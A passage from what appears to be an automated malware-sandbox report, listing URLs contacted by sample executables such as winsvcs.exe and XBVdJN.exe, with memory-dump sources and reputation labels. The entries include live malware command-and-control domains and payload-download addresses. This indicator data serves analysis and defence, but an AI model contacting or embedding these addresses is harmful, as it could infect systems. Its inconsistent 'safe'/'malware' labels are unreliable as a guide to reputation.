0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	false	Avira URL Cloud: malware	unknown
http://slpsrgpsrhojifdij.com/tldr.php?newinf=1	winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://nousiieiffgogogoo.info/	LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	false	Avira URL Cloud: safe	unknown
http://iuirshriuisruruuf.biz/tldr.php?newinf=1	winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://eoroooskfogihisrg.com/tldr.php?newinf=1w	winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://afeifieuuufufufuf.in/tldr.php?newinf=1	winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.develop.comDeepak	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://afeifieuuufufufuf.su/tldr.php?newinf=1	winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ddos.dnsnb8.net:799/cj//k3.rarw	XBVdJN.exe, 0000000A.00000002.2703021536.0000000000C56000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://iuirshriuisruruuf.com/	LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	false	Avira URL Cloud: malware	unknown
http://nousiieiffgogogoo.su/tldr.php?newinf=1oh	winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://eofihsishihiursgu.ru/	LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	false	Avira URL Cloud: safe	unknown
http://eoroooskfogihisrg.info/	LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	false	Avira URL Cloud: malware	unknown
http://nnososoosjfeuhueu.net/tldr.php?newinf=1e	winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://noeuaoenriusfiruu.in/	LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	false	Avira URL Cloud: malware	unknown
http://www.activestate.com	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://srndndubsbsifurfd.su/http://fiiauediehduefuge.su/http://nousiieiffgogogoo.su/http://fifiehsue	LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://fifiehsueuufidhfi.biz/tldr.php?newinf=1.m	winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://slpsrgpsrhojifdij.biz/	LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	false	Avira URL Cloud: malware	unknown
http://srndndubsbsifurfd.biz/tldr.php?newinf=1Gj9	winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://ssofhoseuegsgrfnj.com/	LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	false	Avira URL Cloud: safe	unknown
http://eiifngjfksisiufjf.in/	LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	false	Avira URL Cloud: safe	unknown
http://noeuaoenriusfiruu.com/tldr.php?newinf=1L	winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nousiieiffgogogoo.ru/	LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	false	Avira URL Cloud: malware	unknown
http://afeifieuuufufufuf.in/	LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	false	Avira URL Cloud: malware	unknown
http://www.spaceblue.comMathias	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://fuaiuebndieufeufu.in/tldr.php?newinf=1	winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://iuirshriuisruruuf.ru/	LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	false	Avira URL Cloud: malware	unknown
http://eoroooskfogihisrg.net/tldr.php?newinf=1YA	winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://fifiehsueuufidhfi.net/tldr.php?newinf=1	winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://eofihsishihiursgu.com/tldr.php?newinf=1	winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://eofihsishihiursgu.net/tldr.php?newinf=1wA	winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.lua.org	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net/	XBVdJN.exe, 00000001.00000003.2333200622.00000000011B1000.00000004.00000020.00020000.00000000.sdmp, XBVdJN.exe, 00000001.00000002.2443353213.000000000119A000.00000004.00000020.00020000.00000000.sdmp, XBVdJN.exe, 0000000A.00000003.2549222413.0000000000C4F000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://aiiaiafrzrueuedur.in/	LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	false	Avira URL Cloud: malware	unknown
http://eofihsishihiursgu.net/tldr.php?newinf=1n	winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://fiiauediehduefuge.com/tldr.php?newinf=1Ck%	winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://fifiehsueuufidhfi.com/tldr.php?ne	winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ddos.dnsnb8.net:799/cj//k3.rar:	XBVdJN.exe, 0000000A.00000002.2703021536.0000000000C56000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://afeifieuuufufufuf.info/	LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	false	Avira URL Cloud: safe	unknown
http://eoroooskfogihisrg.in/tldr.php?newinf=15i%	winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net:799/cj//k1.rark8	XBVdJN.exe, 00000001.00000003.2333120316.00000000011DF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://afeifieuuufufufuf.com/tldr.php?newinf=1jk	winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://srndndubsbsifurfd.net/tldr.php?newinf=1A	winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://afeifieuuufufufuf.ru/tldr.php?newinf=1	winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://aiiaiafrzrueuedur.com/	LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	false	Avira URL Cloud: safe	unknown
http://eiifngjfksisiufjf.net/tldr.php?newinf=14A	winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://iuirshriuisruruuf.su/tldr.php?newinf=1so	winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://fuaiuebndieufeufu.net/tldr.php?newinf=1	winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net:799/cj//k4.rarT	XBVdJN.exe, 0000000A.00000002.2703021536.0000000000C56000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://nnososoosjfeuhueu.in/	LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	false	Avira URL Cloud: safe	unknown
http://iuirshriuisruruuf.net/	LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, 